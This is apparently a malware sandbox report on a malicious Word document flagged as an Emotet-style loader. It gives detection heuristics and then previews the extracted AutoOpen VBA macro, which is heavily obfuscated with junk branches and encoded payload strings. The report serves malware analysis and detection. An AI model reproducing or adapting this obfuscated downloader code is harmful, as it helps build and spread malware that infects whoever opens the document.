MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro utilizes CreateObject and appears to be obfuscated, likely intended to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45443 bytes |
SHA-256: d61007f03fdebe38d8a535b429604310cb54be9d569c6f1aa11f18b4ba82b569 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KzDGmMTGzwXQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jwwkZFiWOotXWO"
Function VtNHXaSRw()
On Error Resume Next
Select Case WNTvb
Case 51069
DGMjzQ = 51354
pIIfUV = Sqr(96297)
Case 18773
iQjkAq = CSng(RzaIJk)
ZUJqa = IHwsDi
End Select
hjScSB = zZNIR("R.1zXiIfneUtzaS8dTV6sxc9e9dDxfQZ17KP69wF5qrqM+U5cUN9L6k3NYwPnaObhYPk1cZ6e37cc9f7kRF1OP+vIy1FvqO++e3+RSh+O1JvEiR1VlpY", 3, 108)
Select Case NOsjYD
Case 73042
KrLCP = 68153
ApSmE = Sqr(14465)
Case 66450
KfYiZ = CSng(UqhSLO)
GrjGw = OcznKr
End Select
Select Case zvTRv
Case 12183
pHTwHD = 48315
QjYhEa = Sqr(93128)
Case 13042
kvsGG = CSng(mXswro)
mQNaX = KhKZLf
End Select
NPjtfG = zZNIR("C238yR5GPHdc57ivLl1c/84ii9S6YqDdGAmHYr3GFFnxXmG7x9q6kjqWsSr9sxzzpmF3ls51UUn/d8pL7vz3Ko84fux7n1/fMeD0Et//+Hir8/fmz+Ll7u39qfb4nP3Ury+3VRNeXHx09f740V6lS/S5SLNV4vrNPx1tUgvrxar8Gb0c.", 3, 171)
Select Case jMdPlD
Case 78368
hAOnj = 34186
bOFhtL = Sqr(94403)
Case 16107
iCRwZ = CSng(VhaaI)
tdNnzs = PznnN
End Select
Select Case kztNsm
Case 26788
GCPjzv = 91400
bUvFh = Sqr(20266)
Case 90788
LSjmSK = CSng(CcUlaR)
qGmwE = ijjiXL
End Select
URLGkEkG = zZNIR("w2/fP//z88y9vN2/t7d3LYzN8++Pu+4eLsOe3u6ouPla/vRUv7e+vtmeHPS+v3PN6/7m7KV7fXqpmuPu+vn27+fC3Dz9cXS6vs1/TNL28Wub/S5ZZvkzz/6aXySr5tsqXq3pYf3Jl4vppnbiycPd+vXabnav9unDlzn2d1l/dl86euftH77.UBmXa", 3, 177)
Select Case IczCa
Case 4340
BZFbcw = 25996
HiKUB = Sqr(25727)
Case 57303
SkFISc = CSng(COHJja)
SLYVMR = LUIYR
End Select
Select Case iMIRnO
Case 72187
JQcrVC = 73271
ESkjo = Sqr(49978)
Case 96177
VQNPc = CSng(bELjTf)
prXjG = lvRFV
End Select
ErkbiO = zZNIR("wV1GfcHO2vg2RMfqy/kC+p5VH2lqPtprvsR+5AfqCfUebDrQH/Nn53F50l1kDOf433KR8QJ+1N79ma3nQfegL056tBwYd48zPVo8QdvIZ+fke8T8761vCd+MS9O9mytPsyfgXW3tTxkHI883+xH3SfkLdYz91t9c/1WdjIfDIeIG+0Cf1m8lc/9wHyo53y0J3DekxctPwIj0vi", 3, 198)
Select Case GwGjw
Case 19500
OpwWA = 42413
NpXjp = Sqr(68689)
Case 11873
PaNCi = CSng(MXDLr)
VzUXPW = RVsVW
End Select
Select Case cwfvv
Case 48080
ZcXvi = 25252
Tpcwzo = Sqr(84793)
Case 87803
PcSKh = CSng(lXuJVV)
wbZXOF = mizpqS
End Select
IlWDSvjirU = zZNIR("@mzB4UuMIu4J7hd+DamV97xTsn7sSpEd6Ni3bZeeNcd+G8J8R7Yr1uFd8t6ll3VwG", 5, 57)
Select Case pfSORi
Case 76990
TdOUu = 83893
BUrYbt = Sqr(2697)
Case 44590
amwVli = CSng(TOjvsb)
DnEjHv = tLDmd
End Select
Select Case oXpTOh
Case 73271
bjDsa = 76323
EwVTF = Sqr(89257)
Case 25352
IwWOC = CSng(iaSGYT)
Njuzj = SAXPcA
End Select
JOqmUIvrNi = zZNIR("5RidkCFym86k7Yv572ku9Xs3xRB2TR3PpPfDi1kf+IW9FfYt+ZLw8qN4884Z9sledVOKTmnWCuJEiK7", 7, 70)
Select Case Qpwabh
Case 52236
hVsSj = 53210
FklCUv = Sqr(81978)
Case 30162
UYPuCl = CSng(tNWRpb)
irrojO = jwCWv
End Select
Select Case ilRlY
Case 49052
MsUJp = 10054
EdKarE = Sqr(40162)
Case 2422
CMovY = CSng(IYWro)
dmrrwd = ikwUr
End Select
MkwfwIM = zZNIR("4jINr3yBbwwGn79JHs987+BPZXZeeKTeGwdn73VF+wzfvSKS886Nr8ceaf29I88FfO1OvPiZPs7rXfy0/KVcSd/hc+oR8T9qHitDK/toPr0rPvaE3/wwAZ1Cb4E71u+K1+Z5zEf6vc8n6ivJMLtQTgnWGd1txE/c9+J9cx8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.